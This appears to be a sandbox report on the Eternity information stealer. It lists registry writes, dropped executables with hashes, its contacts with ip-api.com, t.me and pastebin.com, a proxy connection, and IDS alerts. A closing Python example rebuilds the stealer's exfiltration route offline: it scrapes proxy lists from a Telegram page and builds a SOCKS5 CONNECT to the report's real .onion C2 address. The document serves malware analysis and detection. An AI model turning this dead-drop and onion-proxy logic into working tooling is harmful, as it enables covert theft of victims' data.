PID 2016 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName = 1
PID 2016 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet = 1
PID 2016 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect = 0
PID 2340 netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E | LanguageList = en-US
PID 668 babu.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E | LanguageList = en-US
The four ZoneMap values are the defaults that the Internet Settings zone code typically writes the first time a process uses it, and they are what the "Reads the Internet Settings" indicator keys on; the MuiCache entries are written by the shell when a process's resource strings are looked up. None of these is a persistence mechanism or a configuration change made by the stealer, and no other registry writes were recorded.
Executable files: 2
Suspicious files: 3
Text files: 0
Unknown types: 0

Dropped files

PID 2016 powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
PID 2256 bltool 2.7..2.exe | C:\Users\admin\AppData\Local\Temp\z.exe | executable
MD5: 528B540E2AEC29669239482DC9979F4C
SHA256: 28F71E8F8C650B109771F51695785420401839499E15E41A2C634BCE4AB5456C
PID 2016 powershell.exe | C:\Users\admin\AppData\Local\Temp\p25ioqg1.q31.psm1 | binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (not recorded on the page)
PID 2016 powershell.exe | C:\Users\admin\AppData\Local\Temp\xc0g4ttl.yth.ps1 | binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (not recorded on the page)
PID 2256 bltool 2.7..2.exe | C:\Users\admin\AppData\Local\Temp\babu.exe | executable
MD5: 992EBC4C599CA9B6F7E6B1A843609E7D
SHA256: 73D5C4D972107C9BF50F0366A4E8466A3FEC84009CCC080E51FEBE5393708ED4
The two temporary .psm1/.ps1 files share MD5 C4CA4238A0B923820DCC509A6F75849B, which is the MD5 of the single byte "1": PowerShell scaffolding, not payload. The two executables written by bltool 2.7..2.exe are the real drops: babu.exe is the Eternity stub (PID 668), and z.exe carries the same "BLTools Cookies Checker" version resource as the parent but crashes on start (PID 1608).
HTTP(S) requests: 1
TCP/UDP connections: 8
DNS requests: 3
Threats: 7

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
668 | babu.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json | unknown | binary | 288 b | unknown
This is the geolocation lookup from the strings (the query, country, countryCode and city fields feed the "Geolocation: {0}", "Country: {0}" and "City: {0}" lines of Information.txt) and is the only clear-text HTTP request in the capture.

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1080 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
668 | babu.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | unknown
668 | babu.exe | 149.154.167.99:443 | t.me | Telegram Messenger Inc | GB | unknown
668 | babu.exe | 104.20.67.143:443 | pastebin.com | CLOUDFLARENET | - | unknown
668 | babu.exe | 195.66.87.105:8990 | - | NTX Technologies s.r.o. | SC | unknown
The first three rows are guest background noise (NetBIOS and LLMNR). The t.me and pastebin.com TLS connections match the https://t.me/tor_proxies and https://pastebin.com/raw/ strings. The connection to 195.66.87.105:8990 has no domain and is the "Connects to unusual port" hit; given the Socks5-to-Onion signatures under Threats and the "[Network] Using public tor proxy {0}" string, it is consistent with a SOCKS5 proxy taken from the Telegram page and used to reach the .onion C2.

DNS requests

Domain
IP
Reputation
ip-api.com
  • 208.95.112.1
shared
t.me
  • 149.154.167.99
whitelisted
pastebin.com
  • 104.20.67.143
  • 172.67.34.170
  • 104.20.68.143
shared

Threats

PID | Process | Class | Message
668 | babu.exe | Potential Corporate Privacy Violation | AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
668 | babu.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com
668 | babu.exe | Misc activity | ET INFO Observed Telegram Domain (t .me in TLS SNI)
668 | babu.exe | Potentially Bad Traffic | ET INFO Onion/TOR Proxy Client Request
668 | babu.exe | Potential Corporate Privacy Violation | ET POLICY Socks5 Proxy to Onion (set)
668 | babu.exe | Potentially Bad Traffic | ET INFO Onion/TOR Successful Proxy Request Response (Inbound)
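The strings and the Threats rows above describe how the report leaves the host: proxy addresses are scraped from the t.me/tor_proxies page with the tgme_page_description regex, a SOCKS5 CONNECT carrying the .onion name is sent through one of them, and the proxy's reply code is mapped to the error strings in the dump. The Python below is an added example, not Eternity's code or anything from the report, that builds and parses those messages offline. The channel page and the two proxy replies are constructed inputs, the proxy addresses are documentation-range IPs, and port 80 for the C2 is assumed from the http:// scheme of the configured address.

```python
"""Eternity's report delivery path rebuilt from this report's strings (added example):
dead-drop proxy list, SOCKS5 CONNECT to a .onion name, and reply-code mapping."""
import re
import struct

C2_ONION = "izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion"

# Regex copied from the string dump: the channel description of a public t.me page.
TGME_DESCRIPTION = re.compile(r'<div class="tgme_page_description" dir="auto">(.*)</div>')

# Messages in the order they appear in the dump, which is the RFC 1928 REP field order
# (0x00 succeeded ... 0x08 address type not supported).
SOCKS5_REPLY = [
    "Operation completed successfully.",
    "General SOCKS server failure.",
    "Connection not allowed by ruleset.",
    "Network unreachable.",
    "Host unreachable.",
    "Connection refused.",
    "TTL expired.",
    "Command not supported.",
    "Address type not supported.",
]

GREETING_NOAUTH = b"\x05\x01\x00"  # VER=5, one method offered, 0x00 = no authentication


def extract_proxies(html):
    """Dead-drop resolver: host:port pairs found inside the channel description."""
    m = TGME_DESCRIPTION.search(html)
    if not m:
        return []
    pairs = re.findall(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})", m.group(1))
    return [(host, int(port)) for host, port in pairs]


def check_method_selection(data):
    """Proxy's answer to the greeting: VER, METHOD. 0xFF means nothing offered was accepted."""
    if len(data) != 2 or data[0] != 5:
        return "Bad response received from proxy server."
    if data[1] == 0xFF:
        return "None of the authentication method was accepted by proxy server."
    return None


def build_socks5_connect(host, port):
    """SOCKS5 CONNECT with ATYP=0x03 (domain name). Sending the name instead of an
    address is what lets the proxy, not the client, resolve a .onion host."""
    name = host.encode("ascii")
    if len(name) > 255:
        raise ValueError("hostname too long for SOCKS5")
    return b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack(">H", port)


def parse_socks5_request(data):
    """Return (host, port) from a domain-type CONNECT request, or None if it is not one."""
    if len(data) < 5 or data[0] != 5 or data[1] != 1 or data[3] != 3:
        return None
    n = data[4]
    if len(data) != 5 + n + 2:
        return None
    host = data[5:5 + n].decode("ascii", "replace")
    port = struct.unpack(">H", data[5 + n:])[0]
    return host, port


def is_onion_connect(data):
    """What a "Socks5 Proxy to Onion" signature keys on: a CONNECT whose name ends in .onion."""
    parsed = parse_socks5_request(data)
    return parsed is not None and parsed[0].endswith(".onion")


def parse_socks5_reply(data):
    """Map the REP byte of the proxy's reply (VER, REP, RSV, ATYP, ...) to the dump's strings."""
    if len(data) < 2 or data[0] != 5:
        return "Bad response received from proxy server."
    code = data[1]
    return SOCKS5_REPLY[code] if code < len(SOCKS5_REPLY) else "Unknown error."


# Constructed sample inputs (not captured traffic): a channel page and two proxy replies.
SAMPLE_HTML = """<html><body>
<div class="tgme_page_description" dir="auto">proxies: 198.51.100.7:1080 203.0.113.9:8990</div>
</body></html>"""
REPLY_OK = b"\x05\x00\x00\x01" + bytes(4) + b"\x00\x00"      # succeeded, BND.ADDR 0.0.0.0:0
REPLY_DENIED = b"\x05\x02\x00\x01" + bytes(4) + b"\x00\x00"  # connection not allowed by ruleset

if __name__ == "__main__":
    for host, port in extract_proxies(SAMPLE_HTML):
        print("candidate proxy", host, port)
    request = build_socks5_connect(C2_ONION, 80)
    print("onion CONNECT:", is_onion_connect(request), request.hex())
    print(parse_socks5_reply(REPLY_OK))
```

The is_onion_connect check is the essence of the "Socks5 Proxy to Onion" signature: a version-5 CONNECT with address type 0x03 whose name ends in .onion. On a corporate network that rule is low-noise because nothing legitimate hands an .onion name to a public SOCKS proxy on a non-standard port.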
No debug info